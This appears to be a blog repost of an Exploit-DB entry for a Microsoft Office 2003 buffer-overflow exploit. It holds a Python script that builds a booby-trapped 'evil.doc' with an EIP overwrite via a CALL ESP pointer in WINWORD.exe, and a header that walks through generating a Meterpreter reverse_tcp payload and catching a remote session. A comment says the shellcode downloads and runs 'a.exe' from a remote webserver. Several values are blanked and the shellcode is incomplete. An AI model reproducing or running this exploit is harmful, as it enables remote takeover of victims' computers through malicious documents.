lunes, 9 de enero de 2012

Microsoft Office 2003 Home/Pro 0day


# Note from the Exploit-DB team: This might be the same bug as:

# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
# (1) root@bt:~/Desktop/office# ./ #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
# [*] Started reverse handler on #
# [*] Starting the payload handler... #
# [*] Sending stage (752128 bytes) to #
# [*] Meterpreter session 1 opened ( ->
# at 2012-01-08 18:46:26 +0800 #
# #
# meterpreter > ipconfig #
# #
# MS TCP Loopback interface #
# Hardware MAC: 00:00:00:00:00:00 #
# IP Address : #
# Netmask : #
# #
# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #
# Hardware MAC: 00:0c:29:6c:92:42 #
# IP Address : #
# Netmask : #

import binascii

filename = "evil.doc"

# File Structure #
file = (
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"

# Open raw socket to download payload to parent directory as "a.exe" #
# ==> cmd execute "a.exe" #
magic = (

# Two versions of office 2003 floating around: #
# (1) Standalone version, (2) XP Service Pack upgrade #
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #
# #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30" #
# => #
# #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30" #
# => #

EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer

filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18

buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic

# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #

URL = ""
binnu = binascii.b2a_hex(URL)

URL2 = "00"

textfile = open(filename , 'w')

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